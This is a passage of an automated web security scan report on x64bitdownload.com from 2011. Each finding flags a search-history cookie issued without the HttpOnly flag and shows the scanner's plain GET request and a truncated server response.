Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22news%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42617


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.861. http://www.x64bitdownload.com/64-bit-news-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-news-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-news-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:38 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:45:00 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86979


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.862. http://www.x64bitdownload.com/64-bit-news-reader-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-news-reader-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A11%3A%22news-reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A11%3A%22news+reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-news-reader-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:50:30 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:00:32 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A11%3A%22news-reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A11%3A%22news+reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94415


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.863. http://www.x64bitdownload.com/64-bit-newsfeed-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-newsfeed-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22newsfeed%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22newsfeed%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-newsfeed-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:48:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:58:30 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22newsfeed%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22newsfeed%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37199


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.864. http://www.x64bitdownload.com/64-bit-newsgroup-c-44-newsgroup-clients-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-newsgroup-c-44-newsgroup-clients-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-newsgroup-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:33:14 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:43:24 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36453


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.865. http://www.x64bitdownload.com/64-bit-newsgroup-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-newsgroup-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-newsgroup-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:37 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:46 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 76091


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.866. http://www.x64bitdownload.com/64-bit-newsgroups-c-44-newsgroup-clients-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-newsgroups-c-44-newsgroup-clients-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-newsgroups-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:33:52 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:43:59 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31386


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.867. http://www.x64bitdownload.com/64-bit-newsgroups-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-newsgroups-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-newsgroups-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:50:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:01:20 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88631


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.868. http://www.x64bitdownload.com/64-bit-newsreader-c-44-newsgroup-clients-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-newsreader-c-44-newsgroup-clients-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-newsreader-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:42 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:42:43 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32574


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.869. http://www.x64bitdownload.com/64-bit-newsreader-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-newsreader-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-newsreader-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:35:14 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:45:34 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55916


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.870. http://www.x64bitdownload.com/64-bit-nntp-c-44-newsgroup-clients-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-nntp-c-44-newsgroup-clients-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22nntp%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22nntp%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-nntp-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:58 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:43:09 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22nntp%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22nntp%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31814


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.871. http://www.x64bitdownload.com/64-bit-nntp-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-nntp-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22nntp%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22nntp%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-nntp-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:47 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:13 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22nntp%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22nntp%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87718


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.872. http://www.x64bitdownload.com/64-bit-nzb-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-nzb-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22nzb%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22nzb%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-nzb-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:51:47 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:01:48 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22nzb%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22nzb%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60656


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.873. http://www.x64bitdownload.com/64-bit-ozum-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-ozum-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22ozum%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22ozum%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-ozum-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:38 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22ozum%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22ozum%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.874. http://www.x64bitdownload.com/64-bit-par-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-par-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22par%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22par%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /64-bit-par-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:54 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:50:18 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22par%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22par%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64738


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.875. http://www.x64bitdownload.com/64-bit-podcast-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-podcast-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22podcast%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22podcast%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
